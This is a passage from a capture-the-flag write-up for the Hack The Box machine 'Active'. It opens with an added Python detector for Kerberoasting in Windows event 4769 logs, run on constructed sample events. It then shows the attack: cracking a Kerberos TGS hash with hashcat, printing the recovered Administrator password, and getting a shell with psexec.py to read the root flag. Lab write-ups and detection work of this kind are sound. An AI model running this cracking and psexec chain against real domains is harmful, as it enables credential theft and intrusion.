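The etype 23 (RC4) in the `$krb5tgs$23$` hash above is what makes offline cracking cheap, and it is also what a defender can look for: Windows Security event 4769 records every service ticket request with its encryption type, so RC4 tickets issued for user-account SPNs, and especially several distinct SPNs requested by one principal within a short window, are how a Kerberoast sweep shows up in the log. The following is an added example, not code from the original writeup; the events are constructed sample data (SVC_TGS and Administrator match this box, the other account names and the 10.10.14.5 / 10.129.122.x addresses are made up).

```python
# Added example, not part of the original writeup: flag Kerberoasting
# candidates in Windows Security event 4769 (Kerberos service ticket
# requested). The signal is a successfully issued TGS for a user account's
# SPN with TicketEncryptionType 0x17 (RC4, etype 23), and above all several
# distinct SPNs obtained by one requester inside a short window.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"              # AES128-CTS is 0x11, AES256-CTS is 0x12
WINDOW = timedelta(minutes=10)
SWEEP_THRESHOLD = 2            # distinct SPN accounts per requester in WINDOW

# Constructed 4769 events, reduced to the fields the check needs.
SAMPLE_EVENTS = [
    {"time": "2023-06-01T01:20:00", "requester": "jdoe@ACTIVE.HTB",
     "service": "DC$", "etype": "0x12", "ip": "10.129.122.50", "status": "0x0"},
    {"time": "2023-06-01T01:25:00", "requester": "jdoe@ACTIVE.HTB",
     "service": "krbtgt", "etype": "0x17", "ip": "10.129.122.50", "status": "0x0"},
    {"time": "2023-06-01T01:27:00", "requester": "APP01$@ACTIVE.HTB",
     "service": "sqlsvc", "etype": "0x17", "ip": "10.129.122.60", "status": "0x0"},
    {"time": "2023-06-01T01:29:10", "requester": "SVC_TGS@ACTIVE.HTB",
     "service": "Administrator", "etype": "0x17", "ip": "10.10.14.5", "status": "0x0"},
    {"time": "2023-06-01T01:29:11", "requester": "SVC_TGS@ACTIVE.HTB",
     "service": "sqlsvc", "etype": "0x17", "ip": "10.10.14.5", "status": "0x0"},
    {"time": "2023-06-01T01:29:12", "requester": "SVC_TGS@ACTIVE.HTB",
     "service": "backupsvc", "etype": "0x17", "ip": "10.10.14.5", "status": "0x0"},
    {"time": "2023-06-01T01:29:13", "requester": "SVC_TGS@ACTIVE.HTB",
     "service": "websvc", "etype": "0x17", "ip": "10.10.14.5", "status": "0x1B"},
]


def is_roast_candidate(ev: dict) -> bool:
    """RC4 ticket, successfully issued, for a user (not computer/krbtgt) SPN."""
    svc = ev["service"]
    return (ev["status"] == "0x0" and ev["etype"] == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def detect(events: list[dict]) -> list[dict]:
    """One alert per requester that obtained RC4 tickets for user SPNs."""
    by_requester: dict[str, list[dict]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if is_roast_candidate(ev):
            by_requester[ev["requester"]].append(ev)
    alerts = []
    for who, evs in by_requester.items():
        times = [datetime.fromisoformat(e["time"]) for e in evs]
        # Largest number of distinct SPN accounts hit inside any one WINDOW.
        peak = max(len({e["service"] for e, t in zip(evs, times)
                        if t0 <= t <= t0 + WINDOW}) for t0 in times)
        alerts.append({"requester": who, "distinct_services": peak,
                       "services": sorted({e["service"] for e in evs}),
                       "sources": sorted({e["ip"] for e in evs}),
                       "severity": "high" if peak >= SWEEP_THRESHOLD else "low"})
    return alerts
```

A single RC4 request for one service account (the APP01$ entry) is reported as low severity, because on domains where service accounts lack AES keys that is normal traffic; the sweep from SVC_TGS is what should page someone.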
Cracking the TGS hash
Brute-force the hash with `hashcat` and a wordlist.
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ hashcat --example-hashes | grep krb5tgs -B 11
Hash mode #13100
Name................: Kerberos 5, etype 23, TGS-REP
Category............: Network Protocol
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694a...24d9a [Truncated, use --mach for full length]
...
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ hashcat -m 13100 output.txt /usr/share/wordlists/rockyou.txt.gz
hashcat (v6.2.6) starting
...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$23c43ae...ed9130e8:Ticketmaster1968
...
I don't know why winrm showed up in the first Nmap scan, but it doesn't matter: we can repeat the method used earlier for the user flag and fetch root.txt over SMB, or use `psexec.py` to get a command prompt.
┌──(xavier㉿kali)-[~/…/CTF/htb/active/Users]
└─$ psexec.py active.htb/Administrator:[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.122.239.....
[*] Found writable share ADMIN$
[*] Uploading file ouTWePBG.exe
[*] Opening SVCManager on 10.129.122.239.....
[*] Creating service gQQp on 10.129.122.239.....
[*] Starting service gQQp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd \
C:\> cd users/administrator/desktop
C:\Users\Administrator\Desktop> type root.txt
8b074aa02cd800724b6bd39e595974a7